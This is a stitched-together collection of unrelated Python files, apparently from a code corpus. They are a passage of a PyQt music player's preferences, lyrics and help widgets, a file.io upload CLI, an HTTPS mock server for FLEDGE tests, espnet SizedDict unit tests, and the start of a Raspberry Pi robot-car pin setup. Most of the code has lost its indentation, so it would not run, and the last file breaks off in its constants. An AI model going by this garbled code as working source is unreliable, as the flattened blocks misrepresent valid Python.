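def ramp_volume(player, target, step_interval_s=0.005):
    """Step the player volume one unit at a time towards `target`."""
    volume = player.volume()
    step = 1 if target > volume else -1
    while volume != target:
        volume += step
        player.setVolume(volume)
        time.sleep(step_interval_s)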
class ClickableLabel(QtWidgets.QLabel):
# - Call super init from init, passing text and parent depending on whether they are set
# - Emit the pressed signal on the mousePressEvent
pressed = QtCore.Signal()
def __init__(self, text: str = None, parent: QtWidgets.QWidget = None):
if text != None:
super().__init__(text, parent)
else:
super().__init__(parent)
def mousePressEvent(self, event: QtGui.QMouseEvent):
self.pressed.emit()
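# Usage sketch (illustrative): ClickableLabel exposes a custom Qt `pressed` signal, so any
# slot can react to a click, exactly as the basic-help label does in MainWindow above.
def make_dismissable_label(text="Click to dismiss"):
    """Build a label whose custom `pressed` signal hides it on click (call inside a QApplication)."""
    label = ClickableLabel(text)
    label.pressed.connect(label.hide)
    return label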
class Preferences(QtWidgets.QWidget):
# - init:
# - Set geometry variables including from parent widget if a parent was passed, title and application from parameter
# - Call initUI
# - initUI:
# - Set geometry and window title
# - Create widgets and layout
# - Show
def __init__(self, app: QtWidgets.QApplication, parent: QtWidgets.QWidget = None):
super().__init__()
if parent != None:
parentGeometry = parent.geometry()
self.left = parentGeometry.left()
self.top = parentGeometry.top()
else:
self.left = 0
self.top = 0
self.width = 0
self.height = 0
self.title = lib.progName + lib.titleSeparator + self.tr("Preferences")
self.app = app
self.initUI()
def initUI(self):
self.setGeometry(self.left, self.top, self.width, self.height)
self.setWindowTitle(self.title)
self.createWidgets()
self.createLayout()
self.show()
def createWidgets(self):
# Create the style label and combo box, add options from style list
self.styleLabel = QtWidgets.QLabel(self.tr("Style"), self)
self.styleBox = QtWidgets.QComboBox(self)
for style in lib.styles:
self.styleBox.addItem(self.tr(style.name))
# Connect the combo box index change signal to the style selection handler and set the current index to the current style
self.styleBox.currentIndexChanged.connect(self.styleSelectionChanged)
self.styleBox.setCurrentIndex(lib.globalStyleIndex)
# Create other widgets and buttons connecting pressed signals
self.button_clearConfig = QtWidgets.QPushButton(self.tr("Clear All Config"))
self.button_clearConfig.pressed.connect(lib.removeConfigDir)
def createLayout(self):
# Create the QGridLayout and add widgets accordingly with coordinates passed as parameters, set the layout alignment and set the layout
layout = QtWidgets.QGridLayout(self)
layout.addWidget(self.styleLabel, 0, 0)
layout.addWidget(self.styleBox, 0, 1)
layout.addWidget(self.button_clearConfig, 1, 0)
layout.setAlignment(QtCore.Qt.AlignTop)
self.setLayout(layout)
def styleSelectionChanged(self, index: int):
# Set the global style index and stylesheet from the current style in the list, set the QApplication stylesheet and update the main config with the new style index
lib.globalStyleIndex = index
lib.globalStyleSheet = lib.styles[lib.globalStyleIndex].styleSheet
self.app.setStyleSheet(lib.globalStyleSheet)
lib.updateMainConfig("style", index)
class LyricsWidget(QtWidgets.QWidget):
# - Signal trackChanged
# - init:
# - Set parent property
# - Set geometry variables including from the parent window if no geometry was previously recorded in the config for the lyrics widget, otherwise set the previous geometry, as well as title / track detail variables
# - Call initUI
# - initUI:
# - Set the window geometry and title
# - Save the geometry to the config if it has not been previously
# - Set the default text, boolean variables and loading animation properties
# - Create the widgets and layout, along with setting the lyrics token from the executable directory
# - Connect the track changed signal to the search-from-metadata function; call search from metadata if the parent player has media
# - Show
trackChanged = QtCore.Signal()
def __init__(self, parent: MainWindow = None):
super().__init__()
self.parent = parent
if lib.config.__contains__("geometry") and lib.config["geometry"].__contains__("lyrics"):
geometry = lib.config["geometry"]["lyrics"]
self.left = geometry["left"]
self.top = geometry["top"]
self.width = geometry["width"]
self.height = geometry["height"]
elif parent != None:
parentGeometry = self.parent.geometry()
self.left = parentGeometry.left()
self.top = parentGeometry.top()
self.width = parentGeometry.width()
self.height = parentGeometry.height()
else:
self.left = lib.defaultLeft
self.top = lib.defaultTop
self.width = lib.lyrics_defaultWidth
self.height = lib.lyrics_defaultHeight
self.title = lib.progName + lib.titleSeparator + self.tr("Lyrics")
self.initUI()
def initUI(self):
self.setGeometry(self.left, self.top, self.width, self.height)
self.setWindowTitle(self.title)
if not lib.config.__contains__("geometry") or not lib.config["geometry"].__contains__("lyrics"):
if not lib.config.__contains__("geometry"):
lib.config["geometry"] = {}
lib.config["geometry"]["lyrics"] = {}
lib.config["geometry"]["lyrics"]["left"] = self.left
lib.config["geometry"]["lyrics"]["top"] = self.top
lib.config["geometry"]["lyrics"]["width"] = self.width
lib.config["geometry"]["lyrics"]["height"] = self.height
self.songText = ""
self.artistText = ""
self.lastSearchedSong = None
self.lastSearchedArtist = None
self.loadingText = ["Loading", "Loading.", "Loading..", "Loading..."]
self.loadedLyrics = False
self.loadingAnimationInterval_ms = 100
self.createWidgets()
self.createLayout()
# lib.setLyricsToken(lib.execDir)
self.trackChanged.connect(self.loadAndSearchFromMetadata)
if not self.parent.player.media().isNull():
self.loadAndSearchFromMetadata()
self.show()
def moveEvent(self, event: QtGui.QMoveEvent):
# Set the left and top keys in the geometry key of the config dictionary to the corresponding geometric values and write the config to disk
lib.config["geometry"]["lyrics"]["left"] = self.geometry().left()
lib.config["geometry"]["lyrics"]["top"] = self.geometry().top()
lib.writeToMainConfigJSON(lib.config)
def resizeEvent(self, event: QtGui.QResizeEvent):
# Set the width and height keys in the geometry key of the config dictionary to the corresponding geometric values and write the config to disk
lib.config["geometry"]["lyrics"]["width"] = self.geometry().width()
lib.config["geometry"]["lyrics"]["height"] = self.geometry().height()
lib.writeToMainConfigJSON(lib.config)
def createWidgets(self):
# Create labels and line edit boxes for song detail entry, create the search button and scroll view with the output label and word wrap enabled
self.artistLabel = QtWidgets.QLabel("Artist")
self.songLabel = QtWidgets.QLabel("Song")
self.artistBox = QtWidgets.QLineEdit()
self.artistBox.textChanged.connect(self.setArtistText)
self.artistBox.editingFinished.connect(self.search)
self.songBox = QtWidgets.QLineEdit()
self.songBox.textChanged.connect(self.setSongText)
self.songBox.editingFinished.connect(self.search)
self.searchButton = QtWidgets.QPushButton("Search")
self.searchButton.pressed.connect(self.search)
self.scrollView = QtWidgets.QScrollArea()
self.outputLabel = QtWidgets.QLabel()
self.outputLabel.setWordWrap(True)
self.scrollView.setWidget(self.outputLabel)
self.scrollView.setWidgetResizable(True)
self.infoLabel = QtWidgets.QLabel()
lib.setAltLabelStyle(self.infoLabel)
self.infoLabel.hide()
def createLayout(self):
# Create the group boxes, create the grid layout with coordinates added for each widget comprising song details entry, create the layouts for the button and text groups and set the layout
entryGroup = QtWidgets.QGroupBox()
buttonGroup = QtWidgets.QGroupBox()
textGroup = QtWidgets.QGroupBox()
entryLayout = QtWidgets.QGridLayout()
entryLayout.setSpacing(10)
entryLayout.addWidget(self.artistLabel, 0, 0)
entryLayout.addWidget(self.artistBox, 0, 1)
entryLayout.addWidget(self.songLabel, 1, 0)
entryLayout.addWidget(self.songBox, 1, 1)
buttonLayout = QtWidgets.QHBoxLayout()
buttonLayout.addWidget(self.searchButton)
textLayout = QtWidgets.QHBoxLayout()
textLayout.addWidget(self.scrollView)
entryGroup.setLayout(entryLayout)
buttonGroup.setLayout(buttonLayout)
textGroup.setLayout(textLayout)
layout = QtWidgets.QVBoxLayout()
layout.addWidget(entryGroup)
layout.addWidget(buttonGroup)
layout.addWidget(textGroup)
layout.addWidget(self.infoLabel)
self.setLayout(layout)
def setArtistText(self, text: str):
# Set the artist text
self.artistText = text
def setSongText(self, text: str):
# Set the song text
self.songText = text
def loadAndSearchFromMetadata(self):
# If the player has the metadata set, set the placeholder text from the parent metadata on the song details entry boxes, set the artist and song text and run the search
if self.parent.metadata:
metadata = self.parent.metadata
self.artistBox.setPlaceholderText(metadata.artist)
self.songBox.setPlaceholderText(metadata.title)
self.setArtistText(metadata.artist)
self.setSongText(metadata.title)
self.search()
def search(self):
# If the lyrics object exists, the song and artist names are set, and one of the song details has changed, run the second-stage search function on a new thread
if lib.lyricsObject != None and self.songText != "" and self.artistText != "" and (self.lastSearchedArtist != self.artistText or self.lastSearchedSong != self.songText):
searchThread = threading.Thread(target=self._search)
searchThread.start()
def _search(self):
# Start the loading animation, set the song from the lyrics object, switch the loading state when finished, set the output label text from the song lyrics property and set the last searched song and artist
self.loadedLyrics = False
self.loadingAnimation()
self.song = lib.lyricsObject.search_song(self.songText, self.artistText)
self.loadedLyrics = True
self.outputLabel.setText(self.song.lyrics)
self.lastSearchedSong = self.songText
self.lastSearchedArtist = self.artistText
def loadingAnimation(self):
# Run the loading animation on another thread
self.loadingThread = threading.Thread(target=self._loadingAnimation)
self.loadingThread.start()
def _loadingAnimation(self):
# Remember the current info text and hidden state and show the info label; then, while the lyrics have not loaded, cycle the animation: reset the index when a cycle completes, set the label to the current frame text, increment the index and sleep for the configured interval
lastInfoText = self.infoLabel.text()
if self.infoLabel.isHidden():
infoWasHidden = True
self.infoLabel.show()
else:
infoWasHidden = False
animationIndex = 0
animationFrameCount = len(self.loadingText)
while not self.loadedLyrics:
if animationIndex == animationFrameCount:
animationIndex = 0
self.infoLabel.setText(self.loadingText[animationIndex])
animationIndex += 1
time.sleep(self.loadingAnimationInterval_ms / 1000)
# Reset the info label text to the last recorded value and hide the info label if it was previously hidden
self.infoLabel.setText(lastInfoText)
if infoWasHidden:
self.infoLabel.hide()
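# Illustrative sketch (assumption): the search above runs on a worker thread and uses the
# plain boolean `loadedLyrics` as the handshake that stops the loading animation. The
# helper below restates that pattern with hypothetical names; it is not part of the widget.
def run_with_loading_flag(work, on_tick, interval_s=0.1):
    """Run `work` on a background thread and call `on_tick` until it finishes."""
    state = {"done": False}
    def _worker():
        try:
            work()
        finally:
            state["done"] = True
    threading.Thread(target=_worker).start()
    while not state["done"]:
        on_tick()
        time.sleep(interval_s)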
#
# Todo: add comments at some point
#
class HelpWidget(QtWidgets.QWidget):
def __init__(self, parent: MainWindow = None):
super().__init__()
self.parent = parent
self.execDir = lib.get_execdir()
self.iconWidth = 50
# Load window geometry from dict
if lib.config.__contains__("geometry") and lib.config["geometry"].__contains__("help"):
geometry = lib.config["geometry"]["help"]
self.left = geometry["left"]
self.top = geometry["top"]
self.width = geometry["width"]
self.height = geometry["height"]
elif parent != None:
parentGeometry = self.parent.geometry()
self.left = parentGeometry.left()
self.top = parentGeometry.top()
self.width = parentGeometry.width()
self.height = parentGeometry.height()
else:
self.left = lib.defaultLeft
self.top = lib.defaultTop
self.width = lib.lyrics_defaultWidth
self.height = lib.lyrics_defaultHeight
self.title = lib.progName + lib.titleSeparator + self.tr("Help")
self.initUI()
def initUI(self):
self.setGeometry(self.left, self.top, self.width, self.height)
self.setWindowTitle(self.title)
# Save window geometry and position if not already set
if not lib.config.__contains__("geometry") or not lib.config["geometry"].__contains__("help"):
if not lib.config.__contains__("geometry"):
lib.config["geometry"] = {}
lib.config["geometry"]["help"] = {}
lib.config["geometry"]["help"]["left"] = self.left
lib.config["geometry"]["help"]["top"] = self.top
lib.config["geometry"]["help"]["width"] = self.width
lib.config["geometry"]["help"]["height"] = self.height
# Set fixed window size
# self.setFixedSize(550,380)
self.songText = ""
self.artistText = ""
self.lastSearchedSong = None
self.lastSearchedArtist = None
self.createWidgets()
self.createLayout()
self.show()
def moveEvent(self, event: QtGui.QMoveEvent):
# Set the left and top keys in the geometry key of the config dictionary to the corresponding geometric values and write the config to disk
if not lib.config["geometry"].__contains__("help"):
lib.config["geometry"]["help"] = {}
lib.config["geometry"]["help"]["left"] = self.geometry().left()
lib.config["geometry"]["help"]["top"] = self.geometry().top()
lib.writeToMainConfigJSON(lib.config)
def createWidgets(self):
# Create Widgets for Help Window
self.mainPlayerHelpButton = QtWidgets.QPushButton()
self.mainPlayerHelpButton.setIconSize(QtCore.QSize(100,100))
self.mainPlayerHelpButton.setStyleSheet("background-color: rgba(255, 255, 255, 0)")
self.mainPlayerHelpButton.pressed.connect(self.showMainHelp)
self.miniPlayerHelpButton = QtWidgets.QPushButton()
self.miniPlayerHelpButton.setIconSize(QtCore.QSize(100,100))
self.miniPlayerHelpButton.setStyleSheet("background-color: rgba(255, 255, 255, 0)")
self.miniPlayerHelpButton.pressed.connect(self.showMiniHelp)
self.lyricsHelpButton = QtWidgets.QPushButton()
self.lyricsHelpButton.setIconSize(QtCore.QSize(100,100))
self.lyricsHelpButton.setStyleSheet("background-color: rgba(255, 255, 255, 0)")
self.lyricsHelpButton.pressed.connect(self.showLyricHelp)
self.mainPlayerHelpLabel = QtWidgets.QLabel("Main Player")
self.mainPlayerHelpLabel.setAlignment(QtCore.Qt.AlignCenter)
lib.setAltLabelStyle(self.mainPlayerHelpLabel)
self.miniPlayerHelpLabel = QtWidgets.QLabel("Mini Player")
self.miniPlayerHelpLabel.setAlignment(QtCore.Qt.AlignCenter)
lib.setAltLabelStyle(self.miniPlayerHelpLabel)
self.lyricsHelpLabel = QtWidgets.QLabel("Lyrics")
self.lyricsHelpLabel.setAlignment(QtCore.Qt.AlignCenter)
lib.setAltLabelStyle(self.lyricsHelpLabel)
self.welcomeLabel = QtWidgets.QLabel("""
Welcome to the QMusic Help Window
To get started, simply click an icon below.
""")
self.welcomeLabel.setAlignment(QtCore.Qt.AlignVCenter)
self.welcomeLabel.setWordWrap(True)
self.mainHelp = QtWidgets.QLabel("""
The main player is the main window with all features that will start when you open QMusic.
Here you can add music to the playlist by either:
- Dragging and dropping an audio file or directory
- Selecting File -> Open File in the menu bar
- Open an entire folder by selecting File -> Open Directory
""")
self.mainHelp.setAlignment(QtCore.Qt.AlignLeft)
self.mainHelp.setWordWrap(True)
self.miniHelp = QtWidgets.QLabel("""
To enter the Mini Player window, go to Player -> Switch Player Size
Here you can use a simplified player without a playlist and volume view
To exit simply click Switch Player Size Again.
""")
self.miniHelp.setAlignment(QtCore.Qt.AlignLeft)
self.miniHelp.setWordWrap(True)
self.lyricHelp = QtWidgets.QLabel("""
To enter the Lyrics Window, simply go to Player -> Lyrics
Here you can enter a song and artist name to get lyrics from genius.com
To exit simply close the window.
""")
self.lyricHelp.setAlignment(QtCore.Qt.AlignLeft)
self.lyricHelp.setWordWrap(True)
style = lib.config["style"]
if style == 1:
self.mainPlayerHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("main_help_inverted.png", self.execDir)).scaledToWidth(self.iconWidth)))
self.miniPlayerHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("mini_help_inverted.png", self.execDir)).scaledToWidth(self.iconWidth)))
self.lyricsHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("lyrics_help_inverted.png", self.execDir)).scaledToWidth(self.iconWidth)))
else:
self.mainPlayerHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("main_help_icon.png", self.execDir)).scaledToWidth(self.iconWidth)))
self.miniPlayerHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("mini_help_icon.png", self.execDir)).scaledToWidth(self.iconWidth)))
self.lyricsHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("lyrics_help_icon.png", self.execDir)).scaledToWidth(self.iconWidth)))
def createLayout(self):
# Create Layout
labelGroup = QtWidgets.QGroupBox()
buttonGroup = QtWidgets.QGroupBox()
buttonLayout = QtWidgets.QGridLayout()
buttonLayout.setSpacing(10)
buttonLayout.addWidget(self.mainPlayerHelpButton,0,0)
buttonLayout.addWidget(self.miniPlayerHelpButton,0,1)
buttonLayout.addWidget(self.lyricsHelpButton,0,2)
buttonLayout.addWidget(self.mainPlayerHelpLabel,1,0)
buttonLayout.addWidget(self.miniPlayerHelpLabel,1,1)
buttonLayout.addWidget(self.lyricsHelpLabel,1,2)
labelLayout = QtWidgets.QGridLayout()
labelLayout.setSpacing(0)
labelLayout.addWidget(self.mainHelp)
labelLayout.addWidget(self.miniHelp)
labelLayout.addWidget(self.lyricHelp)
labelLayout.addWidget(self.welcomeLabel)
self.mainHelp.hide()
self.miniHelp.hide()
self.lyricHelp.hide()
buttonGroup.setLayout(buttonLayout)
labelGroup.setLayout(labelLayout)
layout = QtWidgets.QVBoxLayout()
layout.setSpacing(0)
layout.addWidget(labelGroup)
layout.addWidget(buttonGroup)
self.setLayout(layout)
# Hide and show widgets for each button
def showMainHelp(self):
self.mainHelp.show()
self.miniHelp.hide()
self.lyricHelp.hide()
self.welcomeLabel.hide()
def showMiniHelp(self):
self.miniHelp.show()
self.mainHelp.hide()
self.lyricHelp.hide()
self.welcomeLabel.hide()
def showLyricHelp(self):
self.lyricHelp.show()
self.mainHelp.hide()
self.miniHelp.hide()
self.welcomeLabel.hide()
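# Minimal launch sketch (assumption: lib.config, styles and the media config are prepared
# by the real entry point before MainWindow is constructed; this module only defines widgets).
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    window = MainWindow(app)
    sys.exit(app.exec_())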
|
file_io_cli.py
|
# Copyright (c) 2018 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from __future__ import division, print_function
import argparse
import clipboard
import json
import os
import requests
import subprocess
import sys
import threading
import time
import uuid
__author__ = 'Niklas Rosenstein <rosensteinniklas@gmail.com>'
__version__ = '1.0.4'
class MultipartFileEncoder(object):
def __init__(self, field, fp, filename=None, boundary=None, headers=None):
self.field = field
self.fp = fp
self.filename = filename
self.boundary = (boundary or uuid.uuid4().hex).encode('ascii')
self.content_type = b'multipart/form-data; boundary=' + self.boundary
headers = dict(headers or {})
if 'Content-Disposition' not in headers:
disposition = 'form-data; name="{}"'.format(self.field)
if self.filename:
disposition += '; filename="{}"'.format(self.filename)
headers['Content-Disposition'] = disposition
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/octet-stream'
self.headers = b'\r\n'.join('{}: {}'.format(k, v).encode('ascii') for k, v in headers.items())
def compute_size(self, include_final_boundary=True):
pos = self.fp.tell()
self.fp.seek(0, os.SEEK_END)
size = self.fp.tell()
self.fp.seek(pos)
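# Fixed framing overhead, mirroring iter_encode(): '--' + boundary + CRLF,
# headers + CRLF + blank-line CRLF, and the CRLF that follows the body.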
size += len(self.boundary) + 4 + 4 + len(self.headers) + 2
if include_final_boundary:
size += 6 + len(self.boundary)
return size
def iter_encode(self, include_final_boundary=True, chunksize=8096):
yield b'--'
yield self.boundary
yield b'\r\n'
yield self.headers
yield b'\r\n'
yield b'\r\n'
# TODO: Check if boundary value occurs in data body.
while True:
data = self.fp.read(chunksize)
if not data: break
yield data
yield b'\r\n'
if include_final_boundary:
yield b'--'
yield self.boundary
yield b'--\r\n'
class GeneratorFileReader(object):
def __init__(self, gen):
self.gen = gen
self.buffer = b''
def readable(self):
return True
def read(self, n=None):
if n is None:
res = self.buffer + b''.join(self.gen)
self.buffer = b''
return res
elif n <= 0:
return b''
else:
res = b''
while n > 0:
part = self.buffer[:n]
res += part
self.buffer = self.buffer[n:]
n -= len(part); assert n >= 0
if not self.buffer:
try:
self.buffer = next(self.gen)
except StopIteration:
break
else:
break
return res
class FileMonitor(object):
def __init__(self, fp, callback=None):
self.fp = fp
self.bytes_read = 0
self.callback = callback
def __getattr__(self, key):
return getattr(self.fp, key)
def read(self, n):
res = self.fp.read(n)
self.bytes_read += len(res)
if self.callback:
self.callback(self)
return res
class ProgressDisplay(object):
SPINCHARS = '\\|/-'
def __init__(self, n_max=None):
self.n_max = n_max
self.alteration = 0
self.last_print = None
def update(self, n_read, force=False):
if not force and self.last_print is not None and time.perf_counter() - self.last_print < 0.25:
return
self.last_print = time.perf_counter()
self.__clear_line(file=sys.stderr)
if self.n_max is None:
c = self.SPINCHARS[self.alteration%len(self.SPINCHARS)]
print('\r{} ({})'.format(c, self.human_size(n_read)),
end='', file=sys.stderr)
else:
w = 60
p = n_read / self.n_max
l = int(w * p)
bar = '[' + '=' * l + ' ' * (w-l) + ']'
print('\r{} {}% ({} / {})'.format(bar, int(p*100),
self.human_size(n_read), self.human_size(self.n_max)),
end='', file=sys.stderr)
sys.stderr.flush()
self.alteration += 1
def finish(self):
print(file=sys.stderr)
@staticmethod
def __clear_line(file=None):
print('\r\33[K', end='', file=file)
@staticmethod
def human_size(n_bytes, units=[' bytes','KB','MB','GB','TB', 'PB', 'EB']):
# https://stackoverflow.com/a/43750422/791713
return str(n_bytes) + units[0] if n_bytes < 1024 else ProgressDisplay.human_size(n_bytes>>10, units[1:])
def stream_file(fp, chunksize=8192):
while True:
data = fp.read(chunksize)
if data: yield data
else: break
def spawn_process(*args, **kwargs):
on_exit = kwargs.pop('on_exit', None)
def worker():
subprocess.call(*args, **kwargs)
if on_exit is not None:
on_exit()
threading.Thread(target=worker).start()
def main(prog=None, argv=None):
parser = argparse.ArgumentParser(prog=prog, description='Upload a file to file.io and print the download link. Supports stdin.')
parser.add_argument('--version', action='version', version=__version__)
parser.add_argument('-e', '--expires', metavar='E',help='set the expiration time for the uploaded file')
parser.add_argument('-n', '--name', help='specify or override the filename')
parser.add_argument('-q', '--quiet', action='store_true', help='hide the progress bar')
parser.add_argument('-c', '--clip', action='store_true', help='copy the URL to your clipboard')
parser.add_argument('-t', '--tar', metavar='PATH', help='create a TAR archive from the specified file or directory')
parser.add_argument('-z', '--gzip', action='store_true', help='filter the TAR archive through gzip (only with -t, --tar)')
parser.add_argument('file', nargs='?', help='the file to upload')
args = parser.parse_args(argv)
if not args.file and not args.tar and sys.stdin.isatty():
parser.print_usage()
return 0
if args.file and args.tar:
parser.error('conflicting options: file and -t, --tar')
if not args.name and args.file:
args.name = os.path.basename(args.file)
elif not args.name and args.tar:
args.name = os.path.basename(args.tar) + ('.tgz' if args.gzip else '.tar')
if args.tar:
r, w = os.pipe()
flags = '-czf-' if args.gzip else '-cf-'
spawn_process(['tar', flags, args.tar], stdout=w, on_exit=lambda: os.close(w))
file_size = None
fp = os.fdopen(r, 'rb')
elif args.file:
file_size = os.stat(args.file).st_size
fp = open(args.file, 'rb')
else:
file_size = None
fp = sys.stdin if sys.version_info[0] == 2 else sys.stdin.buffer
if not args.quiet:
progress = ProgressDisplay(file_size)
fp = FileMonitor(fp, lambda f: progress.update(f.bytes_read))
encoder = MultipartFileEncoder('file', fp, filename=args.name or 'file')
stream = GeneratorFileReader(encoder.iter_encode())
headers = {'Content-Type': encoder.content_type}
params = {}
if args.expires:
params['expires'] = args.expires
# requests builds the query string from `params`, so no manual URL encoding is needed
url = 'http://file.io'
try:
response = requests.post(url, params=params,
data=stream_file(stream), headers=headers)
response.raise_for_status()
except BaseException as exc:
if not args.quiet:
progress.finish()
if isinstance(exc, KeyboardInterrupt):
print('aborted.', file=sys.stderr)
return 1
raise
else:
if not args.quiet:
progress.update(fp.bytes_read, force=True)
progress.finish()
link = response.json()['link']
if args.clip:
print(link, '(copied to clipboard)')
clipboard.copy(link)
else:
print(link)
_entry_point = lambda: sys.exit(main())
if __name__ == '__main__':
_entry_point()
|
__init__.py
|
# Copyright 2021 RTBHOUSE. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
import http.server
import json
import logging
import pathlib
import ssl
import threading
from dataclasses import dataclass
from functools import partial
from urllib.parse import parse_qs
logger = logging.getLogger(__file__)
common_dir = str(pathlib.Path(__file__).absolute().parent.parent)
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, directory, callback, **kwargs):
self.callback = callback
super().__init__(*args, directory=directory, **kwargs)
def end_headers(self) -> None:
self.send_header('X-Allow-FLEDGE', 'true')
self.send_header('Access-Control-Allow-Origin', '*')
return super().end_headers()
def address_string(self):
return f'{self.client_address[0]} -> :{self.server.server_port}'
def do_GET(self):
params = {}
path = self.path
if '?' in path:
path, tmp = path.split('?', 1)
params = parse_qs(tmp)
self.callback(Request(path, params))
logger.debug(f"request path: {path}, params: {params}")
if path.startswith("/report") or path.startswith('/favicon'):
pass
else:
super().do_GET()
@dataclass(init=True, repr=True, eq=False, frozen=True)
class Request:
path: str
params: dict
def get_params(self, key):
return self.params[key]
def get_first_param(self, key):
return self.get_params(key)[0]
def get_first_json_param(self, key):
return json.loads(self.get_first_param(key))
class MockServer:
def __init__(self, port, directory):
self.server_name = 'https://fledge-tests.creativecdn.net'
self.server_port = port
self.server_directory = directory
self.http_server = None
self.requests = []
logger.debug(f"server {self.address} initializing")
server_address = ('0.0.0.0', self.server_port)
self.http_server = http.server.ThreadingHTTPServer(
server_address,
partial(RequestHandler, directory=self.directory, callback=self.requests.append))
self.server_port = self.http_server.server_port
self.http_server.socket = ssl.wrap_socket(
self.http_server.socket,
server_side=True,
certfile=common_dir + '/ssl/fledge-tests.creativecdn.net.crt',
keyfile=common_dir + '/ssl/fledge-tests.creativecdn.net.key',
ssl_version=ssl.PROTOCOL_TLS)
@property
def address(self):
return f'{self.server_name}:{self.server_port}'
@property
def directory(self):
return self.server_directory
def __enter__(self):
logger.debug(f"server {self.address} starting")
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
return self
def run(self):
self.http_server.serve_forever()
def __exit__(self, exc_type, exc_val, exc_tb):
self.http_server.socket.close()
self.http_server.shutdown()
logger.debug(f"server {self.address} stopped")
def get_requests(self):
return self.requests
def get_last_request(self, path):
result = None
for request in self.get_requests():
if request.path == path:
result = request
return result
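# Usage sketch (illustrative only; the port below is a placeholder value):
#
#   with MockServer(port=8443, directory=common_dir) as server:
#       ...  # drive a client against server.address
#       report_request = server.get_last_request('/report')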
|
test_sized_dict.py
|
import multiprocessing
import sys
import numpy as np
import pytest
import torch.multiprocessing
from espnet2.utils.sized_dict import get_size
from espnet2.utils.sized_dict import SizedDict
def test_get_size():
d = {}
x = np.random.randn(10)
d["a"] = x
size1 = sys.getsizeof(d)
assert size1 + get_size(x) + get_size("a") == get_size(d)
def test_SizedDict_size():
d = SizedDict()
assert d.size == 0
x = np.random.randn(10)
d["a"] = x
assert d.size == get_size(x) + sys.getsizeof("a")
y = np.random.randn(10)
d["b"] = y
assert d.size == get_size(x) + get_size(y) + sys.getsizeof("a") + sys.getsizeof("b")
# Overwrite
z = np.random.randn(10)
d["b"] = z
assert d.size == get_size(x) + get_size(z) + sys.getsizeof("a") + sys.getsizeof("b")
def _set(d):
d["a"][0] = 10
@pytest.mark.execution_timeout(5)
def test_SizedDict_shared():
d = SizedDict(shared=True)
x = torch.randn(10)
d["a"] = x
mp = multiprocessing.get_context("forkserver")
p = mp.Process(target=_set, args=(d,))
p.start()
p.join()
assert d["a"][0] == 10
def test_SizedDict_getitem():
d = SizedDict(data={"a": 2, "b": 5, "c": 10})
assert d["a"] == 2
def test_SizedDict_iter():
d = SizedDict(data={"a": 2, "b": 5, "c": 10})
assert list(iter(d)) == ["a", "b", "c"]
def test_SizedDict_contains():
d = SizedDict(data={"a": 2, "b": 5, "c": 10})
assert "a" in d
def test_SizedDict_len():
d = SizedDict(data={"a": 2, "b": 5, "c": 10})
assert len(d) == 3
|
TCP_Control.py
|
#-*- coding:utf-8 -*-
import RPi.GPIO as GPIO
import socket
import time
import string
import threading
#Key values sent by the remote control
run_car = '1' #forward key
back_car = '2' #backward key
left_car = '3' #left key
right_car = '4' #right key
stop_car = '0' #stop key
#Servo key values
front_left_servo = '1' #front servo turn left
front_right_servo = '2' #front servo turn right
up_servo = '3' #camera servo up
down_servo = '4' #camera servo down
left_servo = '6' #camera servo left
right_servo = '7' #camera servo right
updowninit_servo = '5' #camera tilt servo reset
stop_servo = '8' #servo stop
#Car motion state values
enSTOP = 0
enRUN =1
enBACK = 2
enLEFT = 3
enRIGHT = 4
enTLEFT =5
enTRIGHT = 6
#Car servo state values
enFRONTSERVOLEFT = 1
enFRONTSERVORIGHT = 2
enSERVOUP = 3
enSERVODOWN = 4
enSERVOUPDOWNINIT = 5
enSERVOLEFT = 6
enSERVORIGHT = 7
enSERVOSTOP = 8
#Initialize the pan/tilt angles to 90 degrees
ServoLeftRightPos = 90
ServoUpDownPos = 90
g_frontServoPos = 90
g_nowfrontPos = 0
#Motor driver pin definitions
IN1 = 20
IN2 = 21
IN3 = 19
IN4 = 26
ENA = 16
ENB = 13
#Push-button pin
key = 8
#Ultrasonic sensor pins
EchoPin = 0
TrigPin = 1
#RGB LED pins
LED_R = 22
LED_G = 27
LED_B = 24
#Servo pins
FrontServoPin = 23
ServoUpDownPin = 9
ServoLeftRightPin = 11
#Infrared obstacle-avoidance sensor pins
AvoidSensorLeft = 12
AvoidSensorRight = 17
#Buzzer pin
buzzer = 8
#Fire-extinguishing motor pin
OutfirePin = 2
#Line-tracking infrared sensor pins
#TrackSensorLeftPin1 TrackSensorLeftPin2 TrackSensorRightPin1 TrackSensorRightPin2
# 3 5 4 18
TrackSensorLeftPin1 = 3 #first left tracking sensor on pin 3
TrackSensorLeftPin2 = 5 #second left tracking sensor on pin 5
TrackSensorRightPin1 = 4 #first right tracking sensor on pin 4
TrackSensorRightPin2 = 18 #second right tracking sensor on pin 18
#Photoresistor (light-seeking) pins
LdrSensorLeft = 7
